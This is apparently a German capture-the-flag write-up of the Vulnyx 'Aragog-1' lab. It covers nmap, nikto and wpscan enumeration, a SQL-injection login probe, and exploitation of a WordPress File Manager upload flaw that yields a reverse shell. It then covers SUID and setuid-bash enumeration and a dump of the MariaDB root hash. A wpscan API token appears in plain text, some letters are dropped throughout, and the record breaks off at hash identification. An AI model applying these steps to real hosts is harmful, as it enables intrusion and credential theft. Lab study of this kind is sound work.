Aragog-1 - Vulnyx - Level: Medium - Bericht

Medium

Verwendete Tools

nmap
nikto
enum4linux
ftp
gobuster
strings
smbclient
unzip
dex2jar
jd-gui
curl
wfuzz
wpscan
nc
vi
hash-identifier
john

Inhaltsverzeichnis

Reconnaissance

In dieser Phase sammeln wir Informationen über das Zielsystem. Dies ist entscheidend, um potenzielle Schwachstellen zu identifizieren. Wir verwenden verschiedene Tools, um Netzwerkdienste, offene Ports und andere relevante Details zu ermitteln.

Ziel ist es, ein umfassendes Bild der Systemarchitektur und der verfügbaren Angriffspunkte zu erhalten. Die gesammelten Informationen dienen als Grundlage für die weiteren Schritte im Pentesting-Prozess.

┌──(root㉿CCat)-[~]
└─# ARP-Scan
192.168.2.127 08:00:27:b4:5b:fa PCS Systemtechnik GmbH

Mit dem Befehl arp-scan suchen wir im lokalen Netzwerk nach aktiven Hosts. Die Ausgabe zeigt, dass die IP-Adresse 192.168.2.127 mit der MAC-Adresse 08:00:27:b4:5b:fa verbunden ist und von PCS Systemtechnik GmbH stammt.

Diese Information ist nützlich, um das Zielsystem im Netzwerk zu identifizieren und weitere Untersuchungen durchzuführen. Die MAC-Adresse kann auch Hinweise auf den Hersteller der Netzwerkkarte geben.

┌──(root㉿CCat)-[~]
└─# /etc/hosts
192.168.2.127 Aragog.vln

Wir fügen die IP-Adresse des Zielsystems (192.168.2.127) mit dem Hostnamen "Aragog.vln" in die /etc/hosts Datei ein, um die Kommunikation mit dem Webserver zu erleichtern.

Web Enumeration

In dieser Phase konzentrieren wir uns auf die Enumeration der Webdienste, um versteckte Dateien, Verzeichnisse und potenzielle Schwachstellen zu finden. Wir verwenden Tools wie Nikto und Gobuster, um die Webserver-Konfiguration und die verfügbaren Ressourcen zu analysieren.

┌──(root㉿CCat)-[~]
└─# nmap -sV -A --script vuln 192.168.2.127 -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 19:57 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for Aragog.vln (192.168.2.127)
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh penSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.9p1:
| CVE-2023-38408 9.8 https://vulners.com/cve/CVE-2023-38408
| B8190CDB-3EB9-5631-9828-8064A1575B23 9.8 https://vulners.com/githubexploit/B8190CDB-3EB9-5631-9828-8064A1575B23 *EXPLOIT*
| PACKETSTRM:164418 0.0 https://vulners.com/packetstorm/PACKETSTRM:164418 *EXPLOIT*
| PACKETSTRM:152441 0.0 https://vulners.com/packetstorm/PACKETSTRM:152441 *EXPLOIT*
| EDB-ID:47689 0.0 https://vulners.com/exploitdb/EDB-ID:47689 *EXPLOIT*
| EDB-ID:47688 0.0 https://vulners.com/exploitdb/EDB-ID:47688 *EXPLOIT*
| CVE-2024-39884 0.0 https://vulners.com/cve/CVE-2024-39884
| CVE-2024-36387 0.0 https://vulners.com/cve/CVE-2024-36387
| CVE-2024-24795 0.0 https://vulners.com/cve/CVE-2024-24795
|_ CVE-2023-38709 0.0 https://vulners.com/cve/CVE-2023-38709
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-enum:
| /blog/: Blog
|_ /blog/wp-login.php: Wordpress login page.
MAC Address: 08:00:27:B4:5B:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.17 ms Aragog.vln (192.168.2.127) S and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.46 seconds

Dieser Nmap-Scan identifiziert die offenen Ports und Dienste auf dem Zielsystem. Port 22 ist offen für SSH mit OpenSSH 7.9p1, und Port 80 ist offen für HTTP mit Apache 2.4.38.

Der Scan liefert auch Informationen über die MAC-Adresse, das Betriebssystem und die Netzwerkdistanz. Die Vulners-Skripte identifizieren potenzielle Schwachstellen in OpenSSH 7.9p1, einschließlich CVE-2023-38408. Der http-enum Skript findet ein Blog unter `/blog/`, mit einer Wordpress Login Seite unter `/blog/wp-login.php`

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000 | grep open
22/tcp open ssh penSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))

Dieser Befehl wiederholt den Nmap-Scan, filtert aber die Ausgabe, um nur die offenen Ports anzuzeigen. Die Ergebnisse bestätigen die vorherigen Erkenntnisse: SSH (22) und HTTP (80).

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 19:58 CEST
Nmap scan report for Aragog.vln (192.168.2.127)
Host is up (0.00015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSIN
22/tcp open ssh penSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_ 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:B4:5B:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.15 ms Aragog.vln (192.168.2.127) S and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.61 seconds

wir schauen uns die Ports im Detail an

┌──(root㉿CCat)-[~]
└─# Nikto v2.5.0
+ Target IP: 192.168.2.127
+ Target Hostname: 192.168.2.127
+ Target Port: 80
+ Start Time: 2024-10-03 19:59:34 (GMT2)

+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 61, size: 5bee8467b5fd6, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PUTINS: Allowed HTTP Methods: GET, POST, PUTINS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /blog/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /blog/wp-login.php: Wordpress login found.
+ 8102 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2024-10-03 19:59:49 (GMT2) (15 seconds)

+ 1 host(s) tested

Der Nikto-Scan auf Port 80 zeigt mehrere potenzielle Sicherheitslücken: fehlende X-Frame-Options und X-Content-Type-Options Header und die mögliche Offenlegung von Inodes über ETags.

Die Hinweise auf WordPress und die wp-login.php Seite bestätigen die Existenz einer WordPress-Installation. Die fehlende HttpOnly-Flagge für das wordpress_test_cookie könnte zu XSS-Angriffen führen.

┌──(root㉿CCat)-[~]
└─# wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://aragog.vln" -H "Host: FUZZ.aragog.vln" --hc "404" --hh 97
Target: http://aragog.vln/
Total requests: 114442

-------------------------------------------------------------------
ID Response Lines Word Chars Payload
-------------------------------------------------------------------

000009533: 400 12 L 53 W 426 Ch "#www"
000010582: 400 12 L 53 W 426 Ch "#mail"
000047707: 400 12 L 53 W 426 Ch "#smtp"
000103136: 400 12 L 53 W 426 Ch "#pop3" Total time: 0
Processed Requests: 114442
Filtered Requests: 114438
Requests/sec.: 0

Wir verwenden wfuzz, um Subdomains zu finden. Die Ergebnisse zeigen 400er Fehler für verschiedene Payloads, was darauf hindeutet, dass keine relevanten Subdomains gefunden wurden.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,svg,pem,crt,json,conf,ELF,elf,c,java,lib,cgi,csh,config,deb,desc,exp,eps,diff,icon,mod,ln,old,rpm,js.map,pHtml -b '503,404,403' -e --no-error -k
http://192.168.2.127/index.html (Status: 200) [Size: 97]
http://192.168.2.127/blog (Status: 301) [Size: 313] [--> http://192.168.2.127/blog/]

Mit gobuster suchen wir nach weiteren Verzeichnissen und Dateien auf dem Webserver. Wir finden index.html und das Verzeichnis /blog, das zu /blog/ weiterleitet.

: Wordpress Scan :
view-source:http://192.168.2.127/blog/
src='http://wordpress.aragog.hogwarts/blog/wp-includes/js/wp-embed.min.js?ver=5.0.12'

Im Quellcode der Webseite, finden wir einen link zu Wordpress, was auf eine wordpress installation hinweist.

┌──(root㉿CCat)-[~]
└─# grep arag /etc/hosts
192.168.2.127 Aragog.vln wordpress.aragog.hogwarts

Wir fügen nochmals die domain in die Hosts datei ein.

Posted by WP-Admin March 31, 2021 Posted in Uncategorized 1 Comment

Zeigt Infos zu den geposteten Artikeln.

┌──(root㉿CCat)-[~]
└─# wpscan --url http://wordpress.aragog.hogwarts/blog --passwords /usr/share/wordlists/rockyou.txt -e u --api-token RoBoAaM72LLsihlqUJrA1EleT6AJAd9QxQ9rbmQNCY
_______________________________________________________________
__ _______ _____
\ \ / /______ _____
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://wordpress.aragog.hogwarts/blog/ [192.168.2.127]
[+] Started: Thu ct 3 23:32:33 2024

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

| [!] 37 vulnerabilities identified:
|
| [!] Title: WordPress 3.7 to 5.7.1 - bject Injection in PHPMailer
| Fixed in: 5.0.13
| References:
| - https://wpscan.com/vulnerability/4cd46653-4470-40ff-8aac-318bee2f998d
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36326
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19296
| - https://github.com/WordPress/WordPress/commit/267061c9595fedd321582d14c21ec9e7da2dcf62
| - https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/
| - https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9
| - https://www.wordfence.com/blog/2021/05/wordpress-5-7-2-security-release-what-you-need-to-know/
| References:
| - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
| Fixed in: 5.0.22
| References:
| - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
| Fixed in: 5.0.22
| References:
| - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
[+] WordPress theme in use: twentynineteen
| Location: http://wordpress.aragog.hogwarts/blog/wp-content/themes/twentynineteen/
| Last Updated: 2024-07-16T00:00:00.000Z
| Readme: http://wordpress.aragog.hogwarts/blog/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://wordpress.aragog.hogwarts/blog/wp-content/themes/twentynineteen/style.css?ver=1.2
| Style Name: Twenty Nineteen
| Style URI: https://github.com/WordPress/twentynineteen
| Description: ur 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://wordpress.aragog.hogwarts/blog/wp-content/themes/twentynineteen/style.css?ver=1.2, Match: 'Version: 1.2'


[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] WP-Admin
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By: Rss Generator (Passive Detection)

[+] wp-admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
|
[+] WPScan DB API Kro2008 Time: 00:25:42 < > (203680 / 28688956) 0.70% ETA: 59:56:26
| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 23

[+] Finished: Thu ct 3 23:58:21 2024
[+] Requests Done: 203744
[+] Cached Requests: 6
[+] Data Sent: 73.479 MB
[+] Data Received: 917.39 MB
[+] Memory used: 230.141 MB
[+] Elapsed time: 00:25:48

Scan Aborted: Canceled by User

Mit wpscan führen wir einen Scan auf der WordPress-Installation durch. Der Scan identifiziert das verwendete Theme (Twenty Nineteen) und listet eine Reihe von Schwachstellen auf, einschließlich einer 3.7 bis 5.7.1-Objekt Injektion in PHPMailer und andere XSS und Path Traversal Schschwächen. Es findet 2 benutzernamen WP-Admin und Wp-admin, der Scan bricht aber ab.

http://wordpress.aragog.hogwarts/blog/wp-login.php?action=register
"deaktiviert"
http://wordpress.aragog.hogwarts/blog/wp-login.php?registration=disabled

Die Registrierung ist deaktivert.

http://wordpress.aragog.hogwarts/blog/wp-login.php
ERRR: Invalid username. Lost your password?
' R 1=1 -- -

wiederum testen wir SQl injection

┌──(root㉿CCat)-[~]
└─# nikto -h http://wordpress.aragog.hogwarts/blog
+ Target IP: 192.168.2.127
+ Target Hostname: wordpress.aragog.hogwarts
+ Target Port: 80
+ Start Time: 2024-10-03 23:46:27 (GMT2)

+ Server: Apache/2.4.38 (Debian)
+ /blog/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /blog/: Drupal Link header found with value: ; rel="https://api.w.org/". See: https://www.drupal.org/
+ /blog/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PUTINS: Allowed HTTP Methods: PUTINS, HEAD, GET, POST .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /blog/wp-links-opml.php: This WordPress script reveals the installed version.
+ /blog/: A Wordpress installation was found.
+ /blog/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /blog/wp-login.php: Wordpress login found.
+ 8046 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2024-10-03 23:46:49 (GMT2) (22 seconds)

+ 1 host(s) tested

Der Nikto-Scan findet die bekannten Wordpress Pfade, und bestätigt die Existenz der wp login seite.

┌──(root㉿CCat)-[~]
└─# wpscan --url http://wordpress.aragog.hogwarts/blog --passwords /usr/share/wordlists/rockyou.txt -e p --plugins-detection aggressive --api-token RoBoAaM72LLsihlqUJrA1EleT6AJAd9QxQ9rbmQNCY | grep -i rce
| - https://blog.sonarsource.com/wordpress-stored-xss-vulnerability
| - https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/
| [!] Title: File Manager 6.0-6.9 - Unauthenticated Arbitrary File Upload leading to RCE


| [!] Title: File Manager 6.0-6.9 - Unauthenticated Arbitrary File Upload leading to RCE
| Fixed in: 6.9
| References:
| - https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213
| - https://blog.nintechnet.com/critical-zero-day-vulnerability-fixed-in-wordpress-file-manager-700000-installations/
| - https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/
| - https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/
| - https://blog.sucuri.net/2020/09/critical-vulnerability-file-manager-affecting-700k-wordpress-websites.html
| - https://twitter.com/w4fz5uck5/status/1298402173554958338

Wir führen einen WPSCAN mit Plugin Enumration und den gleichen API key durch, und filtern RCE heraus, um schnell die RCE auszunutzen

┌──(root㉿CCat)-[~]
└─# curl http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
{"error":["errUnknownCmd"]}

Es scheint, die installierte Version der Plugins ist anfällig

Just do it... URL: http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
200
Success!?
http://wordpress.aragog.hogwarts/blog/blog/wp-content/plugins/wp-file-manager/lib/php/../files/payload.php ----------------------------------------------------------
Browser
http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/lib/files/payload.php
treffer <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
┌──(root㉿CCat)-[~]
└─# nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.127] 46996
Linux Aragog 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
03:57:16 up 4:29, 0 users, load average: 0.00, 0.00, 0.51
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Wir haben eine Reverse Shell auf dem System.

: Wordpress Scan : Privilege Escalation
www-data@Aragog:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Wir schauen wer wir sind.

www-data@Aragog:/$ find / -type f -perm -4000 -ls 2>/dev/null
3436 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
52 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
3908 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
3583 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
56 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
53 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
55 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
3910 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
12806 428 -rwsr-xr-x 1 root root 436552 Feb 1 2020 /usr/lib/openssh/ssh-keysign
9936 52 -rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
135462 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device

Suche nach SUID

www-data@Aragog:/$ ls -la /etc/passwd
-rw-r--r-- 1 root root 1585 Apr 1 2021 /etc/passwd

wir schauen und die rechte der /etc/passwd an.

getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep

Prüfen ob es Caps gibt.

www-data@Aragog:/var/www/html$ cd /opt/

Gehen ins /opt Verzeichnis

ls -l
total 12
drwxr-xr-x 2 root root 4096 Apr 1 2021 .
drwxr-xr-x 18 root root 4096 Mar 31 2021 ..
-rwxr-xr-x 1 hagrid98 hagrid98 81 Apr 1 2021 .backup.sh

Inhalt des Verzeichnisses

www-data@Aragog:/var/www/html$ ls /home/
ginny hagrid98

Häuser auflisten

www-data@Aragog:/var/www/html$ cat /opt/.backup.sh
#!/bin/bash

#cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads

cp /bin/bash /tmp/bash && chmod +s /tmp/bash

Inhalt anzeigen der Skript Datei

www-data@Aragog:/usr/share/wordpress$ sudo -l
bash: sudo: command not found
www-data@Aragog:/usr/share/wordpress$ ls -la /var/mail/
total 8
drwxrwsr-x 2 root mail 4096 Mar 31 2021 .
drwxr-xr-x 12 root root 4096 Mar 31 2021 ..
www-data@Aragog:/usr/share/wordpress$ ls -la /var/backups/
total 828
drwxr-xr-x 2 root root 4096 ct 3 23:32 .
drwxr-xr-x 12 root root 4096 Mar 31 2021 ..
-rw-r--r-- 1 root root 40960 Apr 1 2021 alternatives.tar.0
-rw-r--r-- 1 root root 1829 Mar 31 2021 alternatives.tar.1.gz
-rw-r--r-- 1 root root 13487 Apr 1 2021 apt.extended_states.0
-rw-r--r-- 1 root root 42 Apr 1 2021 apt.extended_states.1.gz
-rw-r--r-- 1 root root 356 Apr 1 2021 dpkg.diversions.0
-rw-r--r-- 1 root root 166 Apr 1 2021 dpkg.diversions.1.gz
-rw-r--r-- 1 root root 166 Apr 1 2021 dpkg.diversions.2.gz
-rw-r--r-- 1 root root 126 Mar 31 2021 dpkg.diversions.3.gz
-rw-r--r-- 1 root root 172 Mar 31 2021 dpkg.statoverride.0
-rw-r--r-- 1 root root 161 Mar 31 2021 dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 161 Mar 31 2021 dpkg.statoverride.2.gz
-rw-r--r-- 1 root root 161 Mar 31 2021 dpkg.statoverride.3.gz
-rw-r--r-- 1 root root 391231 Apr 1 2021 dpkg.status.0
-rw-r--r-- 1 root root 107912 Apr 1 2021 dpkg.status.1.gz
-rw-r--r-- 1 root root 107912 Apr 1 2021 dpkg.status.2.gz
-rw-r--r-- 1 root root 107309 Mar 31 2021 dpkg.status.3.gz
-rw------- 1 root root 757 Apr 1 2021 group.bak
-rw------- 1 root shadow 630 Apr 1 2021 gshadow.bak
-rw------- 1 root root 1585 Apr 1 2021 passwd.bak
-rw------- 1 root shadow 1032 Apr 1 2021 shadow.bak
cd /tmp/tmp_wp_uploads
/bin/sh: 1: cd: can't cd to /tmp/tmp_wp_uploads

er hat keine rechte

cd /tmp/
www-data@Aragog:/tmp$ ls -la total 8 drwxrwxrwt 2 root root 4096 ct 4 03:53 . drwxr-xr-x 18 root root 4096 Mar 31 2021 ..

inhalt der tmp datei

www-data@Aragog:/tmp$ cd /home/ www-data@Aragog:/tmp/ cd /home/ginny/
drwxr-xr-x 2 ginny ginny 4096 Apr 1 2021 .
drwxr-xr-x 4 root root 4096 Apr 1 2021 ..
www-data@Aragog:/home/ginny$ cd ../hagrid98/ www-data@Aragog:/home/hagrid98$ ls -la
total 28
drwxr-xr-x 3 hagrid98 hagrid98 4096 May 2 2021 .
drwxr-xr-x 4 root root 4096 Apr 1 2021 ..
-rw-r--r-- 1 hagrid98 hagrid98 220 Apr 1 2021 .bash_logout
-rw-r--r-- 1 hagrid98 hagrid98 3526 Apr 1 2021 .bashrc
drwx------ 3 hagrid98 hagrid98 4096 Apr 1 2021 .gnupg
-rw-r--r-- 1 hagrid98 hagrid98 807 Apr 1 2021 .profile
-rw-r--r-- 1 hagrid98 hagrid98 91 Apr 1 2021 horcrux1.txt

wir sind im home Verzeichnis angelangt, und können den Inhalt ansehen.

cat horcrux1.txt
horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw}
https://www.base64decode.org/
"MjogbWFSdm9MbyBHYVVudCdzIHJpTmcgZGVTdHJPeWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw"
1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets
Riddles Tagebuch von Harry in der Kammer des Schreckens zerstört
www-data@Aragog:/home/hagrid98$ uname -a
Linux Aragog 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux

wir bekommen den ersten flag.

www-data@Aragog:/usr/share/wordpress$ cat wp-config.php
.php or /etc/wordpress/config-.php */

wir gucken in der config datei

cd /etc/wordpress www-data@Aragog:/etc/wordpress$ ls -la total 16 drwxr-xr-x 2 root root 4096 Mar 31 2021 . drwxr-xr-x 77 root root 4096 ct 3 23:27 .. -rw-r--r-- 1 root root 241 Mar 31 2021 config-default.php -rw-r--r-- 1 root root 898 Nov 3 2020 htaccess
www-data@Aragog:/etc/wordpress$ cat config-default.php

wir bekommen ein mysql Password

www-data@Aragog:/etc/wordpress$ su root
su: Authentication failure
www-data@Aragog:/etc/wordpress$ mysql -u root -p
Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 206912
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>

wir loggen uns über den MySql ein

show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
use mysql;
show tables;
+---------------------------+
| Tables_in_mysql |
+---------------------------+
| column_stats |
| columns_priv |
| db |
| event |
| func |
| general_log |
| gtid_slave_pos |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| index_stats |
| innodb_index_stats |
| innodb_table_stats |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| roles_mapping |
| servers |
| slow_log |
| table_stats |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| transaction_registry |
| user |
+---------------------------+
select * from user;
+------------------+-----------------------+---------------------------------------------------------------------+-------------+-------------+-------------+-------------+--------------+-----------+-------------+---------------+--------------+-----------+------------+-------------------+------------+------------+--------------+------------+---------------+--------------------+-------------+-----------------+------------------+------------------+--------------------+-----------------------+-----------------------+----------------+------------+--------------+--------------------------+-----------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-------------------------+------------------+---------+--------------+----------------------+
| Host | User | Password | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | Delete_history_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin | authentication_string | password_expired | is_role | default_role | max_statement_time |
+------------------+-----------------------+---------------------------------------------------------------------+-------------+-------------+-------------+-------------+--------------+-----------+-------------+---------------+--------------+-----------+------------+-------------------+------------+------------+--------------+------------+---------------+--------------------+-------------+-----------------+------------------+------------------+--------------------+-----------------------+-----------------------+----------------+------------+--------------+--------------------------+-----------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-------------------------+------------------+---------+--------------+----------------------+
| localhost | root | *EB39FD0B3D9B22D2B74F6D4BED097A6682A53154 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | | N | N | | 0.000000 |
+------------------+-----------------------+---------------------------------------------------------------------+-------------+-------------+-------------+-------------+--------------+-----------+-------------+---------------+--------------+-----------+------------+-------------------+------------+------------+--------------+------------+---------------+--------------------+-------------+-----------------+------------------+------------------+--------------------+-----------------------+-----------------------+----------------+------------+--------------+--------------------------+-----------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-------------------------+------------------+---------+--------------+----------------------+
1 row in set (0.001 sec)

wir machen die MySQL Tables auf.

hash-identifier
/usr/share/hash-identifier/hash-id.py:13: SyntaxWarning: invalid escape sequence '\ ' logo=''' #
# #
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
